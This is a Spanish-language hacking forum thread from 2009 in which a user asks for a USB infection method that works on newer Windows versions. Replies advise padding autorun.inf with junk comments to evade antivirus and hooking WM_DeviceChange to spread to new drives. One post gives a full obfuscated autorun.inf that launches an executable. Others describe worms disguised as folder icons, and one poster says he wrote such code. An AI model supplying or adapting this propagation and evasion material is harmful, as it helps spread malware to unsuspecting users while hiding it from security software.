elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
24 Mayo 2012, 06:37  


Tema destacado: Sigue las noticias más importantes de elhacker.net en ttwitter!

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Karcrack, [Zero])
| | |-+  Nuevo metodo de infeccion USB
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Nuevo metodo de infeccion USB  (Leído 2,767 veces)
Jaixon Jax


Desconectado Desconectado

Mensajes: 855



Ver Perfil
Nuevo metodo de infeccion USB
« en: 7 Julio 2009, 21:35 »

 :silbar: :silbar: :silbar: :silbar:

  Alguien sabe de algun link don haya algun nuevo metodo de infeccion usb que funcione con vista, windows 7 y xp SP3 ya los autorun.inf no funcionan o tal vez habra otra manera desde los autorun?

  agradezco su ayuda gracias!
En línea

Tricalogo del buen forista:
  1.- No postear en hilos de Politica, ni religion, ni feminismo ni Machismo .....
  2.- Nunca solicitar ayuda por MP a alguien del staf .... ellos nunca responden ....
  3.- Aplaudir todos los "aportes" del staf aunque no los entiendas, o creas que no tienen importancia eso es buena onda ....
XcryptOR

Desconectado Desconectado

Mensajes: 225



Ver Perfil
Re: Nuevo metodo de infeccion USB
« Respuesta #1 en: 8 Julio 2009, 00:02 »

como que los autorun.inf no funcionan en vista o windows 7?, no se de donde sacas eso, y cualquiera de los codes que hay aqui funcionan, aunque si quieres una manera profesional usa hooks.

saludos

PD. busca aquí hay mucho acerca de esto

mira y si lo que quieres es que tu autorun.inf no sea detectado agregale basura dentro del archivo, no has visto el contenido del archivo inf de algunos nuevos virus que utilizan propagación por USB


« Última modificación: 8 Julio 2009, 00:04 por XcryptOR » En línea



[Zero]
Moderador
***
Desconectado Desconectado

Mensajes: 1.059


CALL DWORD PTR DS:[0]


Ver Perfil WWW
Re: Nuevo metodo de infeccion USB
« Respuesta #2 en: 8 Julio 2009, 00:06 »

Yo oí que en win7 dejaba de funcionar, no lo probé, pero aunque así sea, solo hay pasarse unas horas delante de la pantalla a pensar  ;).

Saludos
En línea


“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche
Pyros32

Desconectado Desconectado

Mensajes: 49



Ver Perfil
Re: Nuevo metodo de infeccion USB
« Respuesta #3 en: 8 Julio 2009, 00:16 »

como que los autorun.inf no funcionan en vista o windows 7?, no se de donde sacas eso, y cualquiera de los codes que hay aqui funcionan, aunque si quieres una manera profesional usa hooks.

saludos

PD. busca aquí hay mucho acerca de esto

mira y si lo que quieres es que tu autorun.inf no sea detectado agregale basura dentro del archivo, no has visto el contenido del archivo inf de algunos nuevos virus que utilizan propagación por USB




no se que entiendes por hook
y no, el comando open no funciona en XP SP3 , pero shell/ sigue funcionando.. depende mas de la mentalidad del user... pero por la cantidad de worms que lo usan parece que no va mal

no se como ira en windows 7

sigo diciendo que dentro de poco solo quedaran las U3
http://foro.elhacker.net/software/usb_roba_datos_ayudita-t242991.0.html
En línea
Jaixon Jax


Desconectado Desconectado

Mensajes: 855



Ver Perfil
Re: Nuevo metodo de infeccion USB
« Respuesta #4 en: 8 Julio 2009, 00:43 »

  Pyro tiene razon yo los he probado en XP  SP3 y en vista y no funcionan pero todavia es superfactible utilizarlos por que el vista no se masifico, y el seven esta en veremos.
En línea

Tricalogo del buen forista:
  1.- No postear en hilos de Politica, ni religion, ni feminismo ni Machismo .....
  2.- Nunca solicitar ayuda por MP a alguien del staf .... ellos nunca responden ....
  3.- Aplaudir todos los "aportes" del staf aunque no los entiendas, o creas que no tienen importancia eso es buena onda ....
YST


Desconectado Desconectado

Mensajes: 963


I'm you


Ver Perfil WWW
Re: Nuevo metodo de infeccion USB
« Respuesta #5 en: 8 Julio 2009, 00:48 »

En windows vista y en XP SP3 si andan :P , en Windows 7 no anda :P .
En línea



Yo le enseñe a Kayser a usar objetos en ASM
Jaixon Jax


Desconectado Desconectado

Mensajes: 855



Ver Perfil
Re: Nuevo metodo de infeccion USB
« Respuesta #6 en: 8 Julio 2009, 01:20 »

:-[ :-[ :-[ :-[  Jeje YST tiene razon solo hay que llenarlos de basura para que no lo detecte el antiviruscomo dice XcryptOR  ;-) ;-) asi que no hay problema  :silbar: :silbar: :silbar:

En línea

Tricalogo del buen forista:
  1.- No postear en hilos de Politica, ni religion, ni feminismo ni Machismo .....
  2.- Nunca solicitar ayuda por MP a alguien del staf .... ellos nunca responden ....
  3.- Aplaudir todos los "aportes" del staf aunque no los entiendas, o creas que no tienen importancia eso es buena onda ....
XcryptOR

Desconectado Desconectado

Mensajes: 225



Ver Perfil
Re: Nuevo metodo de infeccion USB
« Respuesta #7 en: 8 Julio 2009, 01:48 »

no se que entiendes por hook

me refiero al metodo de propagación USB, interceptando WM_DeviceChange
En línea



Arkangel_0x7C5

Desconectado Desconectado

Mensajes: 298



Ver Perfil
Re: Nuevo metodo de infeccion USB
« Respuesta #8 en: 8 Julio 2009, 02:59 »

no se que entiendes por hook

me refiero al metodo de propagación USB, interceptando WM_DeviceChange
Pero no puedes interceptar nada si antes no te has ejecutado amigo XcryptOR. y este método suele ser la puerta de entrada.

Saludos
En línea

XcryptOR

Desconectado Desconectado

Mensajes: 225



Ver Perfil
Re: Nuevo metodo de infeccion USB
« Respuesta #9 en: 8 Julio 2009, 03:07 »

como te digo me referia a la propagación. Lo del autorun.inf es otra cosa totalmente diferente y ya esta explicado y el tema resuelto agregando basura al autorun.inf, infectas la maquina y la propagación pues el mejor metodo hook. y por si no quedo claro lo de la basura al autorun aqui dejo algo

Código:
;UOybAseGc
;fSAtyuoRHGuCdNhAY
;MUrbLTiFJMCWKBwhIrRTUWFSLkKKnObcIb
[AutoRun]
;GelRnVSPCBbWhlQRlcRxpgxxqZECkGictxtrwjOuqZvqBEqPfWgsCKSEUhxJJCszDvrf
open=nqnrue.exe
;xKISnJXUtfHlapYvyOBzMOqkJUZxMkBcBHFAhFFInPngcWBFfxsDghUHslxYiCJHhNHFvFtcHY
;mXazjMxQVWbHro
;45F27A231FB2BAE1D96E012D0B34BDAC8F820FEAB727D2C7BFC81571
Icon=%system%\shell32.dll,7
;dQSGIGQxaZFKCTvRnAUPHeoAqSdoHU
;DRHjcaNdJpuUxMMMSrowdEovDxvbKNFSfNBat
;uBLMEevUgvmmtqyZbRkixdJIVrujpiXwJOfKFAAyOcdP
;iXoqBhhvXRNSNAjqRUgQfBZecZadEjLKmOfiyF
;uuOSHxEapRiIiHqbVIxWgRPUgALNZJgOUqKSFRWibCHXASfJRbDZlNLFUKBgIjKe
;zTJmDzpSgegsPBwFFLgcJnNpPHxFEHucOj
;kPjQdKgiizzNsZMCBPGdwjowqjhMqwlrbaoVFhZEcptNJprUNSL
;fGFeVzFrOFIzfAUzHtFiSKHVBgpbcTzphhIhfVvmEofmZWcq
;jnsYoJxmDgFJqzUervbcdIBdQoTAaERtKE
;OZvpurmNZfatauHiXsAHJJ
;xQOPNGHjCuupQXQeetQfbCjiICxnQPwKVLwytrRkksiLArzzvHnwmNgnOtMo
;QRJwCAljIXqbUCtPCadZSda
;CuLyIYBtKlCcPmHBzXaqZBUIrSIoONh
;LrRKXZPxVqHbafkNbwOlgmRGytbeYgtBAPbE
;BcmjAwXPKyV
;VE
;VSxCcYmWTpJjrAyRNEY
;CyJCDNMeJmQDXLnWqMf
UseAutoPlay=1
action=Open Drive
;PhDgmoIeBFdFGMGwNuswZxrlTyWTHOFkOlycBgrLjstknQIGWqQRKTmCeJoHIfARQ
;rgTklVYxzoRHZJVRqwkJpOzqzruFWagUmIEHE
action= @nqnrue.exe
;QUJfzEHpLghD
;FLYfwcJaGSTmYaQKFdEFmLWBDmmpSfKkHZyxAEYfmautIpATCYwpEk
;IekNgVjJOxnTwGWJmGkysXymD
;AJvziTizHqMTNpVOHTpwxTQptIQAnz
shell\open\Command=nqnrue.exe
shell\open\Default=1
;uRJSoXjSwlGHhcRfiihECYbQYWqQocDKrQQARVMbSBpvlEw
shell\explore\Command=nqnrue.exe
;gsqJmqJLSkMgCcZJuCiTprlvoaxxmuSjjDFYVnKUWJdSMCFc
En línea



Jaixon Jax


Desconectado Desconectado

Mensajes: 855



Ver Perfil
Re: Nuevo metodo de infeccion USB
« Respuesta #10 en: 8 Julio 2009, 03:42 »

   ::)Buen ejemplo yo ya me habia aislado varios bichos con un autorun similar  :xD :xDpero siempre crei que era para despistar los usuarios, ay unos muy chistoso que cuando le haces click con el boton derecho te sale un poco de caras, matachos en el menu jeje.  ;D ;D ;D
En línea

Tricalogo del buen forista:
  1.- No postear en hilos de Politica, ni religion, ni feminismo ni Machismo .....
  2.- Nunca solicitar ayuda por MP a alguien del staf .... ellos nunca responden ....
  3.- Aplaudir todos los "aportes" del staf aunque no los entiendas, o creas que no tienen importancia eso es buena onda ....
Pyros32

Desconectado Desconectado

Mensajes: 49



Ver Perfil
Re: Nuevo metodo de infeccion USB
« Respuesta #11 en: 8 Julio 2009, 22:24 »

En windows vista y en XP SP3 si andan :P , en Windows 7 no anda :P .

en vista y XP si andan, pero solo pueden crear una opcion en el menu de arranque... no pueden abrir el exe (testeado en XP SP2  Actaulizado sin Antivirus con el code de XcryptOR, con mis codes y con lo que anda por google)



no se que entiendes por hook

me refiero al metodo de propagación USB, interceptando WM_DeviceChange
Pero no puedes interceptar nada si antes no te has ejecutado amigo XcryptOR. y este método suele ser la puerta de entrada.

Saludos

A eso iba, un hook es una intercepcion de una llamada del sistema... no puedes acer qe el se abra tu programa usando hooks
En línea
‭‭‭‭jackl007


Desconectado Desconectado

Mensajes: 1.380


[UserRPL]


Ver Perfil WWW
Re: Nuevo metodo de infeccion USB
« Respuesta #12 en: 9 Julio 2009, 02:04 »

la ves pasada vi un virus que obtenia las carpetas de usuario del usb y se copiaba en ellas con el mismo nombre y con el icono de carpeta; de este modo la probabilidad de que la persona se confunda y en vez de entrar a la carpeta, ejecutaba el virus... (claro al ejecutar el virus, este te mostraba el contenido de la carpeta para no dar sospechas), jaja me llamo mucho la atencion este virus... jajaja
lo malo es que era facil darse cuenta de que el virus estaba corriendo, y eliminarlo fue cosa de segundos... tan solo mirar en el task manager para saber cual era virus... jajaja
En línea

ny0x


Desconectado Desconectado

Mensajes: 336


Ver Perfil
Re: Nuevo metodo de infeccion USB
« Respuesta #13 en: 9 Julio 2009, 02:15 »

waa yo hice un codigo como ese de copiarse en las carpetas y subcarpetas con el mismo nombre  :xD
pero lo del icono de carpeta solo si el original tiene el icono. aunque en vista no todas las carpetas tienen el mismo icono  :-(
En línea
‭‭‭‭jackl007


Desconectado Desconectado

Mensajes: 1.380


[UserRPL]


Ver Perfil WWW
Re: Nuevo metodo de infeccion USB
« Respuesta #14 en: 10 Julio 2009, 20:41 »

tu fuiste en que a cada rato abria y cerraba procesos? (bueno el virus)... eso consumia muchos recursos, por eso fue facil darse cuenta... si es asi... pues tu virusito estubo por PERU, jajaja
y aparecia en msconfig...
facil eliminarlo tambien...
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines